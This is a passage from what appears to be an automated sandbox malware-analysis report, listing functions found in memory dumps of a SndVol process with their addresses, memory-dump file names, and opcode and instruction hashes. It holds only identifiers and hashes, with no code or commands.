                                                                                                                                                  • Opcode ID: 4a0b578f6035fdffff4dc5ca680735d33c125e998ea6e8534d530957075e404a
                                                                                                                                                  • Instruction ID: 72b387f6aa16e7d6ee84a37594c8e54fc6592d5a6552c02ecbeff9ea5a8bf447
                                                                                                                                                  • Opcode Fuzzy Hash: 4a0b578f6035fdffff4dc5ca680735d33c125e998ea6e8534d530957075e404a
                                                                                                                                                  • Instruction Fuzzy Hash: 5D11A075A00724AFE711CF69C845B5B77E8EF84348F114839E985C7610DB35EC00DBA2
                                                                                                                                                  Function 365BF2D0 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0bcb50e4316f52a930ca0904d640b6bab16ed8b7579423094f44b8c72da1deac
                                                                                                                                                  • Instruction ID: 349d4c1b93f99f85c53916c6f75aec6cd5f2ecca541e8ffc6249943a24e1cbf6
                                                                                                                                                  • Opcode Fuzzy Hash: 0bcb50e4316f52a930ca0904d640b6bab16ed8b7579423094f44b8c72da1deac
                                                                                                                                                  • Instruction Fuzzy Hash: CB11C275A00748DBD710CFA9C844B9EB7B8EF85784F54047AE905E7291DA39D901CB92
                                                                                                                                                  Function 366272A0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                                                                  • Instruction ID: a19765ce44a75c405977f0163f08ff57a482e71dbcbe0c929c1ff1922b98631b
                                                                                                                                                  • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                                                                  • Instruction Fuzzy Hash: 2601DEB6140509BFE7028F26CC90E62FB7EFF903D5F800535F280465A0C721ACA0CAA6
                                                                                                                                                  Function 3663B450 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b010affa2c9c17b8fcbaf56ed93a20b011c1e6f153da428dac7c50b91225a3f0
                                                                                                                                                  • Instruction ID: edb92fd34629d72f5ffb61f49170efb0e0029107c07f28d06df136aee6b46ca5
                                                                                                                                                  • Opcode Fuzzy Hash: b010affa2c9c17b8fcbaf56ed93a20b011c1e6f153da428dac7c50b91225a3f0
                                                                                                                                                  • Instruction Fuzzy Hash: 1B01D236542760BFD3228E06CE50F1ABB79EFB1B94FA00028AA815B6B5C264E850C6C4
                                                                                                                                                  Function 36589353 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                  • Instruction ID: 658cf5e0804db4cc139c808795a7aa04b2afc3ee196cf15751c697ad1542ca16
                                                                                                                                                  • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                  • Instruction Fuzzy Hash: 78118E72A10B119FE7228E19C880B12B3E5BF907A6F158878E4894B8A5CB74EC80CF50
                                                                                                                                                  Function 3664F453 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0937913cee0ef8b25ddb1ed7f91233244a628cd699a1187743ed814d74e420f8
                                                                                                                                                  • Instruction ID: c590665579474c862b3757a463ab4b93d57ec0944b3d4df2988be1f32f6a5e19
                                                                                                                                                  • Opcode Fuzzy Hash: 0937913cee0ef8b25ddb1ed7f91233244a628cd699a1187743ed814d74e420f8
                                                                                                                                                  • Instruction Fuzzy Hash: 7C015E71A10358ABDB04DFA9D845FAEBBB8EF84794F404066B900EB291DA74DE01CB95
                                                                                                                                                  Function 3664F5BE Relevance: .0, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3cb4fd5097eb1e3129b50aee9cce251029065ddc18b08351696d899b85ebde79
                                                                                                                                                  • Instruction ID: fd1d72046b5e799ea16cab4aabf2aefe37b32cbd174279d1094254e56634bff3
                                                                                                                                                  • Opcode Fuzzy Hash: 3cb4fd5097eb1e3129b50aee9cce251029065ddc18b08351696d899b85ebde79
                                                                                                                                                  • Instruction Fuzzy Hash: A3017171A00348EFDB04DFA9D845FAEBBB8EF84744F40406AB900EB290DA74DE01CB95
                                                                                                                                                  Function 365B33A5 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                  • Instruction ID: 06993ef1b9e116b08b90cf6ba3dbff6d8525a7ccb80764a249dba3c2c2223f57
                                                                                                                                                  • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                  • Instruction Fuzzy Hash: 9B01D172700215ABCF028EABDC04E9F3AACAF94780F500079B906E7120EA71D942C770
                                                                                                                                                  Function 365CD1D0 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                  • Instruction ID: 7162145f097b70a047f5ba5d926fa7e7ef574227aa78d29fe79d11115ce19e06
                                                                                                                                                  • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                  • Instruction Fuzzy Hash: 2301F7B6A143449BE701CE95EC20F5973A9DBC4678F208239FD14CB280DB34D941CBD6
                                                                                                                                                  Function 365C3E8F Relevance: .0, Instructions: 46COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cacf4d8b3e66fe09251adfb14b24e95d129e220a159b24209437ce3aea398e2d
                                                                                                                                                  • Instruction ID: 2dc9b8f40fa59a25554c38dd9fc8ddf0b077d73e752876ba5d892bcb02cb73e0
                                                                                                                                                  • Opcode Fuzzy Hash: cacf4d8b3e66fe09251adfb14b24e95d129e220a159b24209437ce3aea398e2d
                                                                                                                                                  • Instruction Fuzzy Hash: 8A01A2BA98420A9BC306DFBED690552BBE8FB89294B900539D40AC3B10D632DD06CF59
                                                                                                                                                  Function 3664F367 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 006566cc3faf778fd6e48566c352c7ea1946e7d7ed437d7417e76d5ecfc15bcb
                                                                                                                                                  • Instruction ID: 49bbaf84877e7dc0288f45a9d0b77079105a2b2a9513bb269024703066673a18
                                                                                                                                                  • Opcode Fuzzy Hash: 006566cc3faf778fd6e48566c352c7ea1946e7d7ed437d7417e76d5ecfc15bcb
                                                                                                                                                  • Instruction Fuzzy Hash: B4017171A00358EBD700DFA9D805FAEBBB8EF84744F404066B500EB280D674DD01C795
                                                                                                                                                  Function 3664DEB0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a8dcef1ea7a1a5c91576aed58f969a326c283a32e3c96f2747842530a543bd3a
                                                                                                                                                  • Instruction ID: d87dc5d137f61ffbd604a400c1a9e8073f50cf0e83e3879bad31e2510387ff1f
                                                                                                                                                  • Opcode Fuzzy Hash: a8dcef1ea7a1a5c91576aed58f969a326c283a32e3c96f2747842530a543bd3a
                                                                                                                                                  • Instruction Fuzzy Hash: A501F270E00308ABDB14DFA9D845FAEBBB8EF81784F404036F900EB290DA70D901CBA5
                                                                                                                                                  Function 3664DF2F Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d207afec2102480ec39adb70c7a75b2709189d9699d3a36373fc9481320a6fad
                                                                                                                                                  • Instruction ID: 8d8436e498198448fdddd247f38d9d7293b9a36db4a8e0fff0db58d1d0cf81b9
                                                                                                                                                  • Opcode Fuzzy Hash: d207afec2102480ec39adb70c7a75b2709189d9699d3a36373fc9481320a6fad
                                                                                                                                                  • Instruction Fuzzy Hash: 0A01A771E01308ABDB14DFA9D845FAEBBB8EF84744F404036B900EB391DA74D901C796
                                                                                                                                                  Function 36665636 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 928ff3e6b71a49503fd5012c4507aeae7cce7d478be5093ad0eac74536b32b2a
                                                                                                                                                  • Instruction ID: de6627f6a2db8e0a3e4b4984b89bd6905e2f4cd2a6fedac5ecd7aa9562531e23
                                                                                                                                                  • Opcode Fuzzy Hash: 928ff3e6b71a49503fd5012c4507aeae7cce7d478be5093ad0eac74536b32b2a
                                                                                                                                                  • Instruction Fuzzy Hash: 65118074D00259EFCB04DFA9D445A9EB7B4EF18344F50806AB914EB390E734DA02CBA5
                                                                                                                                                  Function 3665972B Relevance: .0, Instructions: 44COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                                                  • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                                                                                  • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                                                  • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                                                                                  Function 36633370 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ed034e48ead1e6b79cc9206741e1bdfe31b1bc05f27bdd404418cb4b64f8afe9
                                                                                                                                                  • Instruction ID: 3cf9c3c27c1710d1ef4f36c2869038b45234e9b568004590e4ac71bbd0b460f2
                                                                                                                                                  • Opcode Fuzzy Hash: ed034e48ead1e6b79cc9206741e1bdfe31b1bc05f27bdd404418cb4b64f8afe9
                                                                                                                                                  • Instruction Fuzzy Hash: 10113672640A84CFC369CF04C994BA5B7A1EB88B14F14847C944A8BA90CF3AA846DF90
                                                                                                                                                  Function 365ADE2D Relevance: .0, Instructions: 44COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 368e61ba87865aa19346178b7844ae674ffcdb5df96dd9dd0ad9eec9e280710d
                                                                                                                                                  • Instruction ID: 95e628ffed6b46ed9b6563a67ed2228cf4efb2b536102bc92785270cd55c7641
                                                                                                                                                  • Opcode Fuzzy Hash: 368e61ba87865aa19346178b7844ae674ffcdb5df96dd9dd0ad9eec9e280710d
                                                                                                                                                  • Instruction Fuzzy Hash: 480145B8614791CFFB039B11C844BBDBBE8AB527D8F6402B4E9509B1E1D7298D40CA20
                                                                                                                                                  Function 365C5734 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                                                  • Instruction ID: f84262b635f037b14d54c4947aac9acbdb44b766313584eabad898299dc6ea66
                                                                                                                                                  • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                                                  • Instruction Fuzzy Hash: 1AF0AF72A11615AFE309CF9CC940F5AB7EDEB45690F018079D501DB271E671EE04CA94
                                                                                                                                                  Function 36665537 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5a2e78b72f6a20ca8105691d1413c39d0c2674fff7d6c4cefa51c58d59e6fe53
                                                                                                                                                  • Instruction ID: 4877e63147afbfec77a2348ed2085e9f784b9a1286e9408fbe6c60dcc3351ff5
                                                                                                                                                  • Opcode Fuzzy Hash: 5a2e78b72f6a20ca8105691d1413c39d0c2674fff7d6c4cefa51c58d59e6fe53
                                                                                                                                                  • Instruction Fuzzy Hash: 581139B0A00249DFDB04DFA9D845A9DFBF4BF48344F04427AE508EB382E634D941CBA1
                                                                                                                                                  Function 36665060 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 76f3eb391d85858d82a09b60a7cf6fe683f5fae5bb2c66af1da801ecdd93aba0
                                                                                                                                                  • Instruction ID: 501bd2d0022c7987f630bc0bffb17f0741fb0546bb97a01cf0e18823001802b2
                                                                                                                                                  • Opcode Fuzzy Hash: 76f3eb391d85858d82a09b60a7cf6fe683f5fae5bb2c66af1da801ecdd93aba0
                                                                                                                                                  • Instruction Fuzzy Hash: 13015EB1A00208ABCB00DFA9D94199EB7B8EF48344F50406AE900E7391D634E901CBA1
                                                                                                                                                  Function 366650D9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 169be48adcb43a44f862c28be78c97e847b1f4c7ae3ee29a71ec161986844c1e
                                                                                                                                                  • Instruction ID: 7bb3bdfa859b285f7781db5929b745f2fdac786e205a4b687ce0f2a22b727238
                                                                                                                                                  • Opcode Fuzzy Hash: 169be48adcb43a44f862c28be78c97e847b1f4c7ae3ee29a71ec161986844c1e
                                                                                                                                                  • Instruction Fuzzy Hash: 88012CB1A0030DABDB00CFA9D9559DEFBB8EF49344F50406AE900F7390D674AD01CBA5
                                                                                                                                                  Function 36665152 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
